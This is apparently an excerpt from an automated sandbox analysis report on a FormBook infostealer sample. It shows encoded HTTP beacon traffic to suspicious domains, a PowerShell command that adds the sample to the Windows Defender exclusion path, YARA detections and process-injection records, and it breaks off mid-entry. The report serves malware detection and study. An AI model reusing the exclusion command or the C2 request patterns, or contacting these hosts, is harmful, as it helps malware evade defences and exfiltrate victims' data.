                                                          Data Ascii: bFGXGTdX=4gSSAGm8sqza5zA40lgenztSFkK1sS06XCnz6/2+EPMN7w1yoqb5cdX6FJY9Fxie1t5UXTx4WmuEGy9eDvEPoqZHRvUI8SdYEofoHuvoTvcI/xLoxkm67y2xuiJW0JyW7qqFcfo1JHZXHbYiefw+jDQi6GrAZrirW7rHlxKjG/gBnDS3dYj1RT6MuvKSRb+ULWPVgbDkcyR4yaBLRmGTxNgVR7XjEDYHXV0a/LG2cy7DJdrf8l5cvn1cPwrEa4ZTMLqO3Z5tYryCX8WJ/FhBQLyGG+7Hqsch53jiTPKR29gP+PMH9QhTgZxhCCtV7qzATgBxh8fTiKHkABxBgn8IMXnk3uKYHv1UlV1tTp9RClRvTMcw3uRmQiK2horHJPVEdC6QBvOwCY7kYIWEV/DlXqb4rUjYHmlsqe9I1sj50fqOVubwBeIDiRxOjpZDcyp+lscVUsTKykWLoDKwcKOP1Wauoq93bwZ9d7d3wcJQk5RYhvMG4fbMGA3A1QJ0akfLwc4f7LcIOwTLt38Cy8kuuBpzFFZ3kCaasYXbJA3f8DfF58ikTOyGHFnYD4Z2tkBH4TM01Y72XtyVd6Sy8SILaX6IaHY00CGN/rWDfCYqe2FJZtyT7nCcMNPo7yADSdi2iMJnsDVCs87F8AqIAis0zckdviioHCm89d9Tp0lclROkgXXssUki1CdDrT31yeQfkgN8PcZmBUzotGBhXTU94rHPYrrkbwxgmJ3Dpyn8aKuyDtCb1a6of6E/hhERiTW+snREQq6PXnYbZF65F/37nXhgJDa12hE2TZkfdKO020tcw2XT+Woirx8cfC6PClXOZ+SI68LikjT8NN5SSZ+dLRzDVDc1lRmayGmoc/GZlz/NTl9ILjqMVFMoPvdj6S26rYbOZ9YfjttTThR+Zux7Uk2MIClxBOfSDz3hvBpX18YPhPmiJ7jqWhpTWCqo7utxkrgrb0bSzxHfKU3RvwTlWeB3/8FC1McvubCoPs6UaXj [TRUNCATED]
                                                          Sep 11, 2024 22:06:21.178412914 CEST1236INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: Microsoft-IIS/10.0
                                                          X-Powered-By: ASP.NET
                                                          X-Powered-By-Plesk: PleskWin
                                                          Date: Wed, 11 Sep 2024 20:06:20 GMT
                                                          Connection: close
                                                          Content-Length: 1245
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                          Sep 11, 2024 22:06:21.178430080 CEST219INData Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                          Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          44192.168.2.1049752192.250.231.2880
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:06:23.200354099 CEST457OUTGET /o1v8/?bFGXGTdX=1i6yDzrkvfTg1xRY+mVcmT0mAxqtzWYSPwzr6OqMIexmyiVm05r+M/L0QtcaHGif89shAFkQDwq9CioCdeM2s5RrcMFZtF0WLInyLOarA44qlhj6rw==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.cr-pos.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:06:23.711595058 CEST1236INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: Microsoft-IIS/10.0
                                                          X-Powered-By: ASP.NET
                                                          X-Powered-By-Plesk: PleskWin
                                                          Date: Wed, 11 Sep 2024 20:06:23 GMT
                                                          Connection: close
                                                          Content-Length: 1245
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                          Sep 11, 2024 22:06:23.712097883 CEST219INData Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                          Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          45192.168.2.104975347.239.13.17280
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:06:29.481215954 CEST725OUTPOST /d8su/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.trcrb8e8m.sbs
                                                          Origin: http://www.trcrb8e8m.sbs
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.trcrb8e8m.sbs/d8su/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 36 46 70 69 67 74 34 6c 54 79 6c 54 50 32 4f 66 50 6f 48 67 33 66 6b 32 62 6c 70 6f 66 56 73 4d 34 35 6f 4e 64 79 63 42 54 4c 5a 46 45 57 42 79 78 35 73 52 53 52 32 4c 33 46 6f 53 4f 68 47 6f 76 6a 42 70 55 78 56 75 34 72 58 51 76 59 38 77 33 6b 4b 36 6f 61 7a 6e 51 64 37 6a 48 4f 72 2f 62 4a 4f 67 77 6f 77 77 77 39 6b 51 37 2b 45 70 38 55 77 72 51 43 4e 68 59 5a 47 44 34 48 36 46 66 7a 39 30 45 42 64 58 52 68 57 67 72 79 63 52 67 69 45 6a 78 6f 54 76 72 59 30 73 39 68 51 64 75 32 76 2b 45 43 53 6f 4e 4b 71 6f 73 73 52 75 47 74 4d 4b 41 47 74 68 77 63 4a 7a
                                                          Data Ascii: bFGXGTdX=6Fpigt4lTylTP2OfPoHg3fk2blpofVsM45oNdycBTLZFEWByx5sRSR2L3FoSOhGovjBpUxVu4rXQvY8w3kK6oaznQd7jHOr/bJOgwowww9kQ7+Ep8UwrQCNhYZGD4H6Ffz90EBdXRhWgrycRgiEjxoTvrY0s9hQdu2v+ECSoNKqossRuGtMKAGthwcJz
                                                          Sep 11, 2024 22:06:30.426184893 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:06:30 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          46192.168.2.104975447.239.13.17280
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:06:32.013145924 CEST749OUTPOST /d8su/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.trcrb8e8m.sbs
                                                          Origin: http://www.trcrb8e8m.sbs
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.trcrb8e8m.sbs/d8su/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 36 46 70 69 67 74 34 6c 54 79 6c 54 56 58 2b 66 44 76 54 67 79 2f 6b 35 58 46 70 6f 4a 6c 73 41 34 35 30 4e 64 77 77 52 54 34 39 46 45 7a 39 79 32 4c 49 52 54 52 32 4c 76 31 6f 58 4e 52 47 76 76 6a 64 62 55 31 52 75 34 71 7a 51 76 61 30 77 33 33 53 31 75 61 7a 6c 66 39 37 6c 61 65 72 2f 62 4a 4f 67 77 70 56 74 77 2b 55 51 36 4f 55 70 39 31 77 30 54 43 4e 6d 66 5a 47 44 38 48 37 4d 66 7a 39 47 45 41 77 66 52 69 2b 67 72 33 67 52 67 77 38 69 2f 6f 54 68 30 6f 30 79 78 77 6c 34 6f 56 54 35 4d 53 66 38 5a 34 2b 49 72 4e 77 70 58 38 74 64 54 78 78 76 2b 61 38 5a 36 4c 4a 67 6a 65 6f 43 59 70 77 35 31 58 6f 51 32 72 35 4e 4c 51 3d 3d
                                                          Data Ascii: bFGXGTdX=6Fpigt4lTylTVX+fDvTgy/k5XFpoJlsA450NdwwRT49FEz9y2LIRTR2Lv1oXNRGvvjdbU1Ru4qzQva0w33S1uazlf97laer/bJOgwpVtw+UQ6OUp91w0TCNmfZGD8H7Mfz9GEAwfRi+gr3gRgw8i/oTh0o0yxwl4oVT5MSf8Z4+IrNwpX8tdTxxv+a8Z6LJgjeoCYpw51XoQ2r5NLQ==
                                                          Sep 11, 2024 22:06:32.913976908 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:06:32 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          47192.168.2.104975547.239.13.17280
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:06:34.544626951 CEST1762OUTPOST /d8su/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.trcrb8e8m.sbs
                                                          Origin: http://www.trcrb8e8m.sbs
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.trcrb8e8m.sbs/d8su/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 36 46 70 69 67 74 34 6c 54 79 6c 54 56 58 2b 66 44 76 54 67 79 2f 6b 35 58 46 70 6f 4a 6c 73 41 34 35 30 4e 64 77 77 52 54 34 31 46 45 42 46 79 78 62 30 52 43 68 32 4c 6d 56 6f 57 4e 52 48 71 76 6a 55 53 55 77 4a 2b 34 70 62 51 75 2f 67 77 6a 57 53 31 39 36 7a 6c 64 39 37 6b 48 4f 72 71 62 4e 71 6b 77 6f 6c 74 77 2b 55 51 36 49 34 70 72 55 77 30 66 69 4e 68 59 5a 47 31 34 48 36 70 66 7a 45 7a 45 41 31 39 52 54 65 67 73 58 51 52 7a 31 6f 69 7a 6f 54 6a 33 6f 31 68 78 77 35 72 6f 56 2f 44 4d 54 61 30 5a 36 2b 49 6f 74 31 59 4d 65 39 51 51 52 64 4c 33 49 59 4c 6f 50 6b 49 71 39 74 78 61 59 68 6d 33 48 35 43 39 71 59 6e 65 79 4b 4b 73 4b 2b 73 49 70 71 6e 73 46 42 55 75 55 71 75 59 74 70 59 62 51 57 45 76 76 36 47 51 58 55 7a 35 64 77 39 68 76 58 53 5a 45 46 4f 72 7a 34 56 68 37 4c 42 43 45 71 66 6c 44 77 68 44 58 50 62 6b 74 54 6e 4e 31 58 78 5a 68 43 6b 41 79 4d 72 33 4c 73 66 73 67 6f 63 58 5a 43 74 76 33 67 30 55 4e 31 63 65 68 72 5a 2b 37 51 30 78 53 6a 39 53 46 75 4a 4a [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=6Fpigt4lTylTVX+fDvTgy/k5XFpoJlsA450NdwwRT41FEBFyxb0RCh2LmVoWNRHqvjUSUwJ+4pbQu/gwjWS196zld97kHOrqbNqkwoltw+UQ6I4prUw0fiNhYZG14H6pfzEzEA19RTegsXQRz1oizoTj3o1hxw5roV/DMTa0Z6+Iot1YMe9QQRdL3IYLoPkIq9txaYhm3H5C9qYneyKKsK+sIpqnsFBUuUquYtpYbQWEvv6GQXUz5dw9hvXSZEFOrz4Vh7LBCEqflDwhDXPbktTnN1XxZhCkAyMr3LsfsgocXZCtv3g0UN1cehrZ+7Q0xSj9SFuJJxhgmsGWd5Vvv5mwKnBceWpj7CChhwSSQZ6eBqp5yWj3VToKtxIgz53FI0mTZgf65T7mRcq4bE4jAjbx5WDi88kkSkFn44R3kAbDxV31ZRuXy4EkRTB+lDsxWYHXPB5QFlJPjCShIOLjEr62PsSZyh2KyJ+I3INi1fnNc3P9GBCkOtvhbVPj9O5KsEPgint5xDK8dG8tP8S2RR1G5Fbf+687Sq8lYEZKwESbGaaaM/UJeTkw74Wg8SQf1us3hmlTekFqBCM/G7/cYfvuEC0ujllL4+kF9J+mK8pnJDGnzeee6ylI0TtN6blTPhriTgRnXl0VuqZdpYYbDUnyarBc7zBJvFzDs0fN9hMUOg9ybbBjyq+XXd/lF1QkoFYw+1fFgSkMOtaVwnxf8MxiMXJ4nE6yIJad/8w6fH0vGg2aBQhIn7Z1Dbdy4fWWIW2CbYv3hExZWcYHQymHd4P5zR6ZiQbPTQLloIcsyUBv7G30Ryiy725B2MZJQuDJY6rj1/rwGVIjGFYHkMGDu5vFF158gKnW21V4yBLqrQ6ofiE0DHbLvMmJR6pH3lqHvl2acWG2v0W7Hq+u1mPz92aOmPKTVLmBB8f7spdKQPCSTua3YVAhcYjFSlv+WqyEHmK/WVrVWyjY8tLOztsY9XITcnCQivX8aOwkfbfNCX2 [TRUNCATED]
                                                          Sep 11, 2024 22:06:35.474220991 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:06:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          48192.168.2.104975647.239.13.17280
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:06:37.075231075 CEST460OUTGET /d8su/?bFGXGTdX=3HBCjYMba2FPA3TIMZ366tJLR19IJjxz0bIsDTYva69fDAgKwrpmDBuz3X8ZHGWOiFUXNC9bte/eip1p2XCq457JVfW7M++UWZyl/bQwgvBliJsYpA==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.trcrb8e8m.sbs
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:06:37.962395906 CEST224INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:06:37 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:16:02:09
                                                          Start date:11/09/2024
                                                          Path:C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe"
                                                          Imagebase:0x23e06540000
                                                          File size:3'079'318 bytes
                                                          MD5 hash:EE557BE5D5E16D9EA01241F09A19A87B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:16:02:14
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force
                                                          Imagebase:0x7ff7b2bb0000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:16:02:14
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff620390000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:16:02:14
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                          Imagebase:0xbf0000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:16:02:14
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):
                                                          Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                          Imagebase:
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:16:02:15
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\WerFault.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7448 -s 1404
                                                          Imagebase:0x7ff745f20000
                                                          File size:570'736 bytes
                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:16:02:18
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff6616b0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:16:02:23
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe"
                                                          Imagebase:0x6c0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:12
                                                          Start time:16:02:24
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\SysWOW64\SecEdit.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\SecEdit.exe"
                                                          Imagebase:0x9a0000
                                                          File size:37'888 bytes
                                                          MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:14
                                                          Start time:16:02:37
                                                          Start date:11/09/2024
